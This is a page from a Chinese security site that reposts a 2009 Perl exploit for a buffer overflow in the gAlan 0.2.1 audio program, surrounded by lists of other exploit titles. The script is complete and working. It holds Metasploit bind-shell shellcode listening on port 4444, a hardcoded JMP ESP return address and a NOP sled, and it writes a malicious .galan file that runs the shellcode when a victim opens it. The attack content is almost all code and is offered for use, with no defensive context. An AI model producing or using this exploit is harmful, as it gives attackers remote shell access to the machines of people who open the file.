首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
gAlan 0.2.1 Buffer Overflow 0day Exploit
来源:jbrownsec.blogspot.com 作者:Brown 发布时间:2009-12-08  

#!/usr/bin/perl
# kpasa.pl
# AKA
# gAlan Buffer Overflow 0day Exploit
#
# Jeremy Brown [0xjbrown41@gmail.com//jbrownsec.blogspot.com//krakowlabs.com] 12.07.2009
#
# *********************************************************************************************************
#
# "From Static Analysis to 0day Exploit"
#
# Originally a SecurityTubeCon Presentation, which I'm guessing was canceled without notice? At any rate,
# DoJoSec picked it up so thanks to those guys for that.
#
# Presentation: http://www.viddler.com/explore/dojosec/videos/3/
#
# not_you: "gotta restart (sp1 install vista)"
# me:      "i don't see how you use that operating system"
#
# kpasa.pl

# windows/shell_bind_tcp - 696 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_mixed
# EXITFUNC=seh, LPORT=4444
$shellcode =
"\x89\xe0\xdd\xc7\xd9\x70\xf4\x5b\x53\x59\x49\x49\x49\x49" .
"\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51" .
"\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32" .
"\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41" .
"\x42\x75\x4a\x49\x4b\x4c\x43\x5a\x4a\x4b\x50\x4d\x4b\x58" .
"\x4a\x59\x4b\x4f\x4b\x4f\x4b\x4f\x45\x30\x4c\x4b\x42\x4c" .
"\x47\x54\x47\x54\x4c\x4b\x51\x55\x47\x4c\x4c\x4b\x43\x4c" .
"\x44\x45\x43\x48\x45\x51\x4a\x4f\x4c\x4b\x50\x4f\x45\x48" .
"\x4c\x4b\x51\x4f\x47\x50\x43\x31\x4a\x4b\x51\x59\x4c\x4b" .
"\x50\x34\x4c\x4b\x43\x31\x4a\x4e\x46\x51\x49\x50\x4d\x49" .
"\x4e\x4c\x4b\x34\x49\x50\x44\x34\x43\x37\x49\x51\x48\x4a" .
"\x44\x4d\x43\x31\x49\x52\x4a\x4b\x4c\x34\x47\x4b\x50\x54" .
"\x51\x34\x46\x48\x43\x45\x4d\x35\x4c\x4b\x51\x4f\x46\x44" .
"\x45\x51\x4a\x4b\x43\x56\x4c\x4b\x44\x4c\x50\x4b\x4c\x4b" .
"\x51\x4f\x45\x4c\x45\x51\x4a\x4b\x43\x33\x46\x4c\x4c\x4b" .
"\x4c\x49\x42\x4c\x47\x54\x45\x4c\x43\x51\x48\x43\x46\x51" .
"\x49\x4b\x45\x34\x4c\x4b\x47\x33\x46\x50\x4c\x4b\x47\x30" .
"\x44\x4c\x4c\x4b\x42\x50\x45\x4c\x4e\x4d\x4c\x4b\x51\x50" .
"\x43\x38\x51\x4e\x43\x58\x4c\x4e\x50\x4e\x44\x4e\x4a\x4c" .
"\x46\x30\x4b\x4f\x49\x46\x45\x36\x51\x43\x45\x36\x42\x48" .
"\x47\x43\x50\x32\x42\x48\x44\x37\x42\x53\x47\x42\x51\x4f" .
"\x50\x54\x4b\x4f\x48\x50\x45\x38\x48\x4b\x4a\x4d\x4b\x4c" .
"\x47\x4b\x50\x50\x4b\x4f\x48\x56\x51\x4f\x4c\x49\x4b\x55" .
"\x43\x56\x4d\x51\x4a\x4d\x44\x48\x43\x32\x46\x35\x43\x5a" .
"\x43\x32\x4b\x4f\x4e\x30\x42\x48\x48\x59\x44\x49\x4c\x35" .
"\x4e\x4d\x46\x37\x4b\x4f\x49\x46\x46\x33\x51\x43\x46\x33" .
"\x51\x43\x46\x33\x47\x33\x51\x43\x47\x33\x46\x33\x4b\x4f" .
"\x48\x50\x42\x46\x43\x58\x42\x31\x51\x4c\x45\x36\x50\x53" .
"\x4c\x49\x4d\x31\x4d\x45\x42\x48\x49\x34\x44\x5a\x44\x30" .
"\x48\x47\x50\x57\x4b\x4f\x4e\x36\x42\x4a\x42\x30\x46\x31" .
"\x51\x45\x4b\x4f\x48\x50\x45\x38\x49\x34\x4e\x4d\x46\x4e" .
"\x4d\x39\x46\x37\x4b\x4f\x48\x56\x46\x33\x51\x45\x4b\x4f" .
"\x48\x50\x45\x38\x4b\x55\x51\x59\x4b\x36\x51\x59\x50\x57" .
"\x4b\x4f\x49\x46\x50\x50\x51\x44\x51\x44\x46\x35\x4b\x4f" .
"\x4e\x30\x4d\x43\x43\x58\x4d\x37\x42\x59\x49\x56\x42\x59" .
"\x50\x57\x4b\x4f\x48\x56\x46\x35\x4b\x4f\x4e\x30\x45\x36" .
"\x43\x5a\x43\x54\x45\x36\x43\x58\x42\x43\x42\x4d\x4d\x59" .
"\x4b\x55\x43\x5a\x50\x50\x46\x39\x47\x59\x48\x4c\x4d\x59" .
"\x4b\x57\x42\x4a\x51\x54\x4b\x39\x4a\x42\x50\x31\x49\x50" .
"\x4c\x33\x4e\x4a\x4b\x4e\x50\x42\x46\x4d\x4b\x4e\x50\x42" .
"\x46\x4c\x4c\x53\x4c\x4d\x42\x5a\x50\x38\x4e\x4b\x4e\x4b" .
"\x4e\x4b\x42\x48\x44\x32\x4b\x4e\x48\x33\x45\x46\x4b\x4f" .
"\x42\x55\x50\x44\x4b\x4f\x49\x46\x51\x4b\x46\x37\x46\x32" .
"\x50\x51\x46\x31\x46\x31\x43\x5a\x45\x51\x46\x31\x50\x51" .
"\x50\x55\x50\x51\x4b\x4f\x4e\x30\x42\x48\x4e\x4d\x49\x49" .
"\x44\x45\x48\x4e\x51\x43\x4b\x4f\x48\x56\x42\x4a\x4b\x4f" .
"\x4b\x4f\x46\x57\x4b\x4f\x48\x50\x4c\x4b\x50\x57\x4b\x4c" .
"\x4c\x43\x49\x54\x45\x34\x4b\x4f\x48\x56\x46\x32\x4b\x4f" .
"\x48\x50\x45\x38\x4a\x50\x4c\x4a\x44\x44\x51\x4f\x51\x43" .
"\x4b\x4f\x49\x46\x4b\x4f\x48\x50\x41\x41";

$magic     = "Mjik";
$addr      = 0x7E429353; # JMP ESP @ user32,dll
$filename  = "bof.galan";

$retaddr = pack('l', $addr);

$payload = $magic . $retaddr x 258 . "\x90" x 256 . $shellcode;

     open(FD, '>' . $filename);
     print FD $payload;
     close(FD);


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Polipo 1.0.4 Remote Memory Cor
·Adobe Illustrator CS4 v14.0.0
· Help Workshop 4.74 (hhp Proje
·Adobe Illustrator CS4 v14.0.0
·IDEAL Administration 2009 v9.7
·gAlan (.galan file) Universal
·Symantec System Center Alert M
·gAlan 0.2.1 Buffer Overflow Ex
·又一上传突破
·Audio Workstation v6.4.2.4.0 (
·Audio Workstation 6.4.2.4.3 pl
·VLC Media Player 1.0.3 smb://
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved